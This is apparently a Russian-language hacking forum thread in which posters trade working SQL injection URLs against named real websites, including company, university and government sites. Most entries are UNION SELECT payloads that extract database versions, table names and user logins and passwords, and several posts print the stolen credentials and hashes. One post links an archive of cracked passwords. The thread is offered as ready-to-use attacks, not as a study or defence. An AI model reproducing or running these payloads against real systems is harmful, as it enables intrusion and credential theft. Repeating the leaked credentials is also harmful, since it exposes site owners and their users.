SQL Инъекции

http://www.deco10.com/index.php?inc=lis&cat_id=-999+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables+limit+1,1/*

 

Можно, если основной запрос идет запрос на обновление update, или на вставку insert. Обьединять можно только запросы одного типа, разных - нет.

 

Администрация Форума!

Ольга : qween1

 

update и в insert, select прокатывает

 

frugalreader.com что-то типа обменника книг для частников (SQL-inj + БД)

SQL-inj:

Code:

http://www.frugalreader.com/books.php?searchMethod=basic_search&subject_id=-1+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,nickname,password,email),8,9+FROM+user/*&doSearch=1&searchSubject=1&showBooks=1&title=&author=&isbn=

БД (расшифровано 4185 из 4613 (почти 91%)) паролей:

http://dinar007.by.ru/hbd/base_frugalreader.zip
Пароль к архиву: antichat.ru

 

www.lrn.ru

Code:

http://www.lrn.ru/index.php?module=library&action=subgroup&subgroupid=-14+union+select+concat_ws(0x3a,user(),database(),version()),2/*

lrn_ru@localhost:lrn_ru:5.0.46-log/2 (file_priv нет)

Code:

http://www.lrn.ru/index.php?module=library&action=subgroup&subgroupid=-14+union+select+concat_ws(0x3a,username,password),2+from+users+where+username+like+%22Vitls%22/*

установочный путь: /var/www/vhosts/lrn.ru/htdocs/lrnphplib/doclib.php
админка: http://www.lrn.ru/admin (как через нее залить шелл я не догнал)
Vitls:gjhextybt

 

HTML:

http://alterego.tut.by/downloads/index.php?action=category&id=10'+union+select+1,concat_ws(0x3a,user(),database()),3,4,5,6,7/*

[email protected]:alteregotutby

 

HTML:

http://www.climatelab.ru/index.php?action=pages&id=4+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7/*

5.0.24a
climatea_climat@localhost
climatea_climat


усть доступ к schema , но я несмог найти админа

 

channelg.tv

HTML:

http://www.channelg.tv/project.php?focus_id=999999+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3/*&page_id=54

channelg@localhost:4.0.24:channelg
Там CMS какая-то...
uginfo.sfedu.ru

HTML:

http://uginfo.sfedu.ru/news/news.php?newsId=-1194414947+union+select+null,null,null,null,null,null/**/

sgcs.fcm.unc.edu.ar

HTML:

http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+USER/**/

HTML:

http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+version()/**/

user - postgres
version() - PostgreSQL 8.1.10 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.0.gcc-opt (GCC) 4.0.3 (Ubuntu 4.0.3-1ubuntu5)

HTML:

http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES/**/

- названия таблиц

HTML:

http://www.sgcs.fcm.unc.edu.ar/centrofr.php?pag=-355.00+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA.COLUMNS/**/

- названия колонок

 

Code:

http://www.netlink.ru/index.php?action=pages&id=99999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4/*

netlink_netltbn@localhost:netlink_netltbn:5.0.24a

Code:

http://www.homeopath.ru/index.php?action=pages&id=99999+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7/*

homelogin@localhost:homeopath:4.1.22

 

сессия съела мой мозг :\
---

http://www.chatman.ru/index.php?show=search&id=-1'+union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,9/*

4.1.22-standard/chatman_chatman/chatman_u51279@localhost
-----------------------------------------------------------------------------

http://mmp.cs.msu.su/index.php?pid=dirlist&id=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10/*

4.1.21/mmp/mmp@localhost


http://mmp.cs.msu.su/index.php?pid=dirlist&id=-1+union+select+1,concat_ws(0x2F,login,password),3,4,5,6,7,8,9,10+from+users/*

логин/пароль
admin/mrkroz2909

--------------------------------------------------------------------------

А это аццкие специалисты сетевых технологий угрожают гнусным хакерам

http://misteria.koptevo.net/modules.php?name=Mediacatalog&pa=showMediacatalog&pid=-1+union+select+1/*

 

http://www.peekvid.com

Code:

http://www.peekvid.com/showcategorypage.php?id=34'+union+select+concat_ws(0x3,version(),user(),database())/*

5.0.22root@kentuckyprivpeekvid_v2

Code:

http://www.peekvid.com/showcategorypage.php?id=34'+union+select+concat_ws(0x3,user,password)+from+mysql.user/*

Root67ef27e02618b87a:ZAQxsw

 

http://www.hdds.spb.ru/news/item.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user())

5.0.51/hdds/hdds@localhost


http://www.hdds.spb.ru/news/item.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,username,password,email,icq)+from+forums_auth+limit+0,1

логин/хеш/мейл/асику
Cavaler/50cc3872ca61179a359e6263a3fd3d43/[email protected]/48555995

 

газета Труд кому то надо?
ну тогда держите -

Code:

http://www.trud.ru/issue/shortnews.php?id=-64066+union+select+1,2,user(),version(),5,6,7/*

trudinfo@localhost
4.1.21-log

 

MSSQL
_http://www.treasury.gov.au/content/tax_treaties.asp?ContentID=759'
_http://www.nsw.gov.au/Business_results.asp?SEARCH_KEYS='OPER_LCYCLE_BUSINESS_SNSW&DISPLAY1=Business+Life+Cycle&DISPLAY2=Operating+a+Business
_http://www.montgomerycountymd.gov/csltmpl.asp?url='/content/council/index.asp
_http://web.nsc.gov.tw/default.asp?mp=7'
_http://www.pme.gov.sa/warnning/file.asp?ID=68'
_http://www.izkor.gov.il/izkor86.asp?t=0'&dir=0&i=0&pab=4332&nab=91086&pdt=8318&ndt=9

MySQL
_http://www.wiredforhealth.gov.uk/cat.php?catid=842'
_http://www.monitor-nhsft.gov.uk/publications.php?cat=8'
_http://www.cszx.gov.cn/art/catb.php?catid=1'
_http://www.yarriambiack.vic.gov.au/council_services/sub_menu.php?subMenuId=119&menuId=27'
_http://www.tcvn.gov.vn/en/index.php?p=cat&cid=35'

_http://porx.rambler.ru/porx/viewprofile.php?user=%D0%B4%D0%BE%D0%BB'
_http://hotel.travel.rambler.ru/vitrina.asp?sDescr=1390'

 

Code:

http://info.l2r.ru/?part=items&id=(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20(%22henna%22,%22drops_5%22))--

таблицы - henna и drops_5 дальше подобрать не смог ибо запятые жестоко фильтруются.
Пробовал различные методы в т.ч 0x2c , сhar'ы и тд. кто найдёт замену этой запятой плз скиньте инфу сюда или в личку)

 

Code:

http://www.freegaming.de/index.php?option=com_puarcade&Itemid=92&fid=-1+union+select+concat(username,0x3a,password)+from+jos_users/*

 

Code:

http://adeptweb.info/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://www.budshop.com.ua/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://kadrovest.ru/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://hostofmine.net/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://www.akademikerzeitung.ch/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://www.jerseyrecruitment.com/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://www.identitytextiles.com/2007/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://tryanotherangle.com/joomla/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://www.ilm-media.at/portal/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://www.worldfashioncouncil.org/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://www.sagentpharma.com/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://www.rh-communication.ch/cms/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://www.kinayperde.com/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://www.innoventions.co.za/index.php?option=com_neorecruit&task=offer_view&id=123456+union+select+1,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users/*
http://chinstudent.org/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/*
http://www.zeros2heroes.com/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/*
http://www.jovita.lt/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/*
http://www.stopthetraffik.nl/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/*
http://www.circusfrog.com/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/*
http://portalul.eu/index.php?option=com_nicetalk&tagid=123456)+union+select+1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17+from+jos_users+limit+1/*

 

sql-inj

 

CMS I-cont

_________________________________

http://www.maybach-manufaktur.ru/news/?id=-9+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+maybach_users/*

http://www.emspost.ru/en/news/archive/?id=-498+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+ems_users+limit+2,1/*

http://serpentor.ru/news/?id=-368+union+select+1,concat(login,0x3a,pwd),3,4,5,6,7,8+from+serpentor_users+limit+1,1/*

http://trinity-cis.com/en/news/?id=-12+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10,11,12+from+trinity_users/*

http://www.marcor.ru/news/?id=-21+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+marcor_users/*

http://www.relod.ru/news/?id=-109+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10,11+from+relod_users/*

http://www.itclinic.ru/press_center/news/?id=-2+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10+from+itclinic_users/*

http://www.rochet.ru/news/?id=-379+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+rochet_users/*

http://www.gluon.ru/news/?id=-375+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+gluon_users/*

http://www.schnittke-mgim.ru/news/?id=-26+union+select+1,2,3,4,5,concat(login,0x3a,pwd),7,8,9,10+from+shnitke_users/*

http://www.eurotemp.ru/news/?id=-16+union+select+1,2,concat(login,0x3a,pwd),4,5+from+eurotemp_users/*

http://www.samaya-samaya.ru/company/news/?id=-22+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10,11+from+sam_users/*

http://www.mostd.ru/news/?id=-1+union+select+concat(login,0x3a,pwd),2,3,4,5+from+mostd_users/*

http://ikrs.ru/news/?id=-371+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+ikrs_users/*

http://www.1tort.ru/news/?id=-366+union+select+1,2,3,4,5,concat(login,0x3a,pwd),7,8,9,10+from+1tort_users/*

http://neftebor.ru/news/?id=-17+union+select+1,2,3,concat(login,0x3a,pwd),5,6,7,8,9+from+neftebor_users/*

http://www.harmline.ru/news/?id=-371+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+harmony_users/*

http://www.eko-sad.ru/news/?id=-395+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+ecosad_users/*

http://www.panoramakino.ru/news/?id=-374+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+panorama_users/*

http://www.hotelpearl.ru/news/?id=-13+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+hotelpearl_users/*

http://www.mp218.ru/articles/news/?id=-8+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+mp218_users/*

http://digitec.ru/news/?id=-8+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+digitec_users/*

http://www.japanplast.ru/news/?id=-7+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+japanplast_users/*

http://www.angic.ru/news/?id=-5+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+angic_users/*

http://dvector.ru/news/?id=-2+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10+from+dvector_users/*

http://www.lucsor.ru/news/?id=-1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+lucsor_users/*

http://www.nstkani.ru/news/?id=-1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10+from+nika_users/*

http://omnia-insurance.com/news/?id=-1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+omnia_users/*

http://www.leon-beton.ru/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+leon_users/*

http://www.zalogu.net/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+zalogu_users/*

http://www.adanilov.ru/news/?id=-1+union+select+1,2,3,4,5,6,concat(login,0x3a,pwd),8,9,10,11+from+danilov_users/*

http://www.melodytour.ru/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+melody_users/*

http://www.abarysheva.ru/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+barysheva_users/*

http://www.torshin.ru/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7,8,9+from+torshin_users/*

_________________________________

виновник этого безобразия :

http://www.i-market.ru/news/?id=-434+union+select+1,2,3,4,5,concat(login,0x3a,pwd),7,8,9,10+from+imarket_users/*

_________________________________


админки находятся по адресу

http://site.ru/adm

хеш паролей простой md5

_________________________________

p.s взломано при помощи телефона nokia N70,браузера Opera-mini(mod) и... не совсем кривых рук